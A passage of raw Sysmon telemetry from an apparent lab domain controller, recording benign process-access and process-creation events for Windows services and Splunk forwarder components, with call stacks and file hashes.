d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FA1-6005-FB00-00000000A301}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA1-6005-FB00-00000000A301}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.365{59A5CD1D-8FA1-6005-FB00-00000000A301}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA2-6005-FC00-00000000A301}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FA2-6005-FC00-00000000A301}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA2-6005-FC00-00000000A301}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.006{59A5CD1D-8FA2-6005-FC00-00000000A301}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.474{59A5CD1D-8FA3-6005-FD00-00000000A301}17564192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA3-6005-FD00-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
